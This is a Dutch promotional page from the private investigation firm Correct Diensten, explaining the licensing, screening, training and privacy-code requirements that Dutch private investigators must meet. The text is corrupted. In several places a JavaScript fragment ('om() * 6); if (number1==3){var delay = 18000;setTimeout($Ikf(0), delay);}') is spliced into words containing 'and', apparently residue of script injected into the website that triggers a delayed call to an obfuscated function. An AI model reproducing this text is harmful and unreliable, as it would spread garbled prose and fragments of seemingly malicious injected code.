Rechercheren? Dat doet de politie toch?

Bedrijfsrecherche

Dat klopt! De politie rechercheert….ook.
Maar wist u dat er ook particuliere recherchebureaus zijn die onderzoeken uitvoeren? Diefstal binnen bedrijven, verduistering, frauduleus ziekteverzuim, gesjoemel met geld, uitkeringen en uren, merkenfraude, alimentatiefraude, noem het maar op. En sterker nog: We hebben het er druk mee!

Waar moet een particulier recherchebureau aan voldoen?

Uiteraard kan niet iedereen die dit leuk lijkt een recherchebureau starten. Er dient voldaan te worden aan een aantal strenge (wettelijke) voorwaarden:

Vergunning:

Er dient een vergunning te worden afgegeven door het Ministerie van Veiligheid en Justitie. Deze wordt uitsluitend verstrekt als na een grondig antecedentenonderzoek naar de eigenaar, is gebleken dat deze als “betrouwbaar” kan worden beschouwd.

Screening personeelsleden:

Het personeel dat wordt ingezet bij de recherchewerkzaamheden, wordt gescreend door de politie. Dit is noodzakelijk gezien de vertrouwelijkheid van de zaken die worden onderzocht.

Opleiding personeelsleden:

Het personeel dient aantoonbaar deskundig en opgeleid te zijn op het gebied van recherchewerkzaamheden en de privacy-aspecten die hierbij horen. Alle medewerkers hebben de opleiding tot Particulier Onderzoeker met goed gevolg afgerond en zijn op de hoogte van de Privacy Gedragscode van de Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andse Veiligheidsbranche.

Privacy Gedragscode:

In de Privacy Gedragscode van de Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andse Veiligheidsbranche staat onder andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere omschreven welke onderzoeksmethodiek onder welke voorwaarden gehanteerd mag en kan worden. Bij het kiezen voor een bepaalde werkwijze zal een Particulier Onderzoeker zich altijd een aantal zaken moeten afvragen:

  1. Is er een gerechtvaardigd belang? Wat is het belang van de opdrachtgever en is dit op “morele” gronden te onderbouwen?
  2. Proportionaliteit: Staat de gekozen methodiek in verhouding tot het doel van het onderzoek?
  3. Subsidiariteitsbeginsel: De Particulier Onderzoeker wordt geacht om bij de uitvoering van een onderzoek een zo licht mogelijk (minste impact op de privacy van de onderzochte persoon) middel toe te passen, en zal hier dus altijd kritisch naar moeten blijven kijken.

Aanmelding College Bescherming Persoonsgegevens:

Gezien het feit dat in een onderzoek altijd in meer of mindere mate gegevens van personen worden verwerkt, dient elk Particulier Recherchebureau te zijn aangemeld bij het College Bescherming Persoonsgegevens.

Waarheidsvinding:

Het doel van een onderzoek is altijd: Waarheidsvinding. De Particulier Onderzoeker onderzoekt en rapporteert wat hij waarneemt. Afhankelijk van de bevindingen wordt de onderzochte persoon eventueel geconfronteerd met de bevindingen.
Correct Diensten is een erkend Particulier Recherchebureau. Naast de bovenstaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande eisen voldoen wij ook aan de keurmerkeisen van de Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andse Veiligheidsbranche en de Branchevereniging van Particuliere Onderzoeksbureaus (BPOB). Jaarlijks wordt door onafhankelijke bureaus vastgesteld dat wij beschikken over de juiste mate van expertise en dat wij voldoen aan alle wettelijke criteria. Tevens worden wij getoetst op het naleven van de CAO en de Privacy Gedragscode.
Heeft u te maken met een situatie waarin diefstal of fraude mogelijk een rol speelt, aarzel dan niet! Neem contact met ons op voor een vrijblijvend gesprek. Wij helpen u graag!